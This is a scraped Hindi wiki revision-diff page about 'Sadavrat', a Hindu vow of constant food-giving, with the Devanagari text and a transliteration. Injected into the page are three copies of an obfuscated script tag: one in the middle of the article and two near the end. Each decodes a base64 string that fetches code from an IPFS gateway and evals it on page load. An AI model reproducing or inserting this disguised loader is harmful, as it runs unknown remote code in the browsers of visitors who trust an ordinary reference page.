Difference between revisions of "सदाव्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "उल्लखित" to "उल्लिखित")
m (Text replace - ")</ref" to "</ref")
 
(3 intermediate revisions by 2 users not shown)
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*सदाव्रत 'अन्नदानमाहात्म्य' कहा गया है।  
 
*सदाव्रत 'अन्नदानमाहात्म्य' कहा गया है।  
*हेमाद्रि<ref>(हेमाद्रि व्रत खण्ड 2, 469-475)</ref> में भविष्योत्तरपुराण का उद्धरण आया है कि [[कृष्ण]] ने [[युधिष्ठर]] से दूसरों को [[अन्न]] (भोजन) देने की महत्ता बतायी है और कहा है कि [[राम]] एवं [[लक्ष्मण]] को ब्रह्मभोज न देने के कारण बनवास भोगना पड़ा। राजा श्वेत को स्वर्ग में भी भूख की पीड़ा सहनी पड़ी, क्योंकि उसने भूखे [[ब्राह्मण|ब्राह्मणों]] को भोजन नहीं दिया था।  
+
*हेमाद्रि<ref>हेमाद्रि व्रत खण्ड 2, 469-475</ref> में भविष्योत्तरपुराण का उद्धरण आया है कि [[कृष्ण]] ने [[युधिष्ठर]] से दूसरों को अन्न (भोजन) देने की महत्ता बतायी है और कहा है कि [[राम]] एवं [[लक्ष्मण]] को ब्रह्मभोज न देने के कारण बनवास भोगना पड़ा। राजा श्वेत को स्वर्ग में भी भूख की पीड़ा सहनी पड़ी, क्योंकि उसने भूखे [[ब्राह्मण|ब्राह्मणों]] को भोजन नहीं दिया था।  
 
*इस व्रत का अर्थ है सदा भोजन (व्रत) देना।  
 
*इस व्रत का अर्थ है सदा भोजन (व्रत) देना।  
 
*आजकल इसे 'सदावर्त', 'सदाबर्त' कहते हैं।  
 
*आजकल इसे 'सदावर्त', 'सदाबर्त' कहते हैं।  
*हेमाद्रि<ref>(हेमाद्रि व्रत खंड 2, 471)</ref> में एक [[श्लोक]] है 'भोजन प्राणियों का जीवन है, यही उनकी [[शक्ति]] है, [[शौर्य]] है और [[सुख]] है, अत: अन्नदाता प्रत्येक वस्तु का दाता कहा जाता है।  
+
*हेमाद्रि<ref>हेमाद्रि व्रत खंड 2, 471</ref> में एक [[श्लोक]] है 'भोजन प्राणियों का जीवन है, यही उनकी शक्ति है, शौर्य है और सुख है, अत: अन्नदाता प्रत्येक वस्तु का दाता कहा जाता है।  
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 13:01, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • sadavrat 'annadanamahatmy' kaha gaya hai.
  • hemadri[1] mean bhavishyottarapuran ka uddharan aya hai ki krishna ne yudhishthar se doosaroan ko ann (bhojan) dene ki mahatta batayi hai aur kaha hai ki ram evan lakshman ko brahmabhoj n dene ke karan banavas bhogana p da. raja shvet ko svarg mean bhi bhookh ki pi da sahani p di, kyoanki usane bhookhe brahmanoan ko bhojan nahian diya tha.
  • is vrat ka arth hai sada bhojan (vrat) dena.
  • ajakal ise 'sadavart', 'sadabart' kahate haian.
  • hemadri[2] mean ek shlok hai 'bhojan praniyoan ka jivan hai, yahi unaki shakti hai, shaury hai aur sukh hai, at: annadata pratyek vastu ka data kaha jata hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri vrat khand 2, 469-475
  2. hemadri vrat khand 2, 471

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>